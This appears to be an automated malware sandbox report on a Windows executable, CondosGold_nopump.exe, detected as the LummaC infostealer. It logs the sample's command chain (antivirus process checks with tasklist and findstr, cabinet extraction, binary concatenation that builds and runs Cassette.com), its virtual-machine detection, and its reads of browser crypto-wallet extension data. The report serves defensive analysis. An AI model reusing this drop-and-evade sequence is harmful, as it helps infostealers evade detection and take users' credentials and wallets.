Windows Analysis Report
CondosGold_nopump.exe

Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Code function: 5_2_0040737E	5_2_0040737E
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Code function: 5_2_00406EFE	5_2_00406EFE
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Code function: 5_2_004079A2	5_2_004079A2
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Code function: 5_2_004049A8	5_2_004049A8

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\352348\Cassette.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

Code function: String function: 004062CF appears 58 times

Source: CondosGold_nopump.exe

Static PE information: invalid certificate

Source: CondosGold_nopump.exe

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: CondosGold_nopump.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/23@12/2

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

5_2_004044D1

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

Code function: 5_2_004024FB CoCreateInstance,

5_2_004024FB

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsq9068.tmp

Source: CondosGold_nopump.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: CondosGold_nopump.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

File read: C:\Users\user\Desktop\CondosGold_nopump.exe

Source: unknown	Process created: C:\Users\user\Desktop\CondosGold_nopump.exe "C:\Users\user\Desktop\CondosGold_nopump.exe"
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Drives Drives.cmd & Drives.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 352348
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CERTAIN" Panties
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Singapore + ..\Vegetarian + ..\Dating + ..\Wings + ..\Audit + ..\Relates + ..\Trip E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\352348\Cassette.com Cassette.com E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Drives Drives.cmd & Drives.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 352348	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CERTAIN" Panties	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Singapore + ..\Vegetarian + ..\Dating + ..\Wings + ..\Audit + ..\Relates + ..\Trip E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\352348\Cassette.com Cassette.com E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: CondosGold_nopump.exe

Static file information: File size 1378152 > 1048576

Source: CondosGold_nopump.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

Code function: 5_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

5_2_00406328

Source: CondosGold_nopump.exe

Static PE information: real checksum: 0x156039 should be: 0x1530b3

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Jump to dropped file

Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com

System information queried: FirmwareTableInformation

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com TID: 2436	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com TID: 6780	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Code function: 5_2_00406301 FindFirstFileW,FindClose,		5_2_00406301
Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Code function: 5_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		5_2_00406CC7

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\352348	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\352348\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

Code function: 5_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

5_2_00406328

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\CondosGold_nopump.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Drives Drives.cmd & Drives.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 352348	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CERTAIN" Panties	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Singapore + ..\Vegetarian + ..\Dating + ..\Wings + ..\Audit + ..\Relates + ..\Trip E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\352348\Cassette.com Cassette.com E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: Cassette.com, 00000012.00000000.1328218480.00000000005B3000.00000002.00000001.01000000.00000008.sdmp, Sharon.15.dr, Cassette.com.7.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\CondosGold_nopump.exe

Code function: 5_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

5_2_00406831

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Yara detected LummaC Stealer

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\352348\Cassette.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
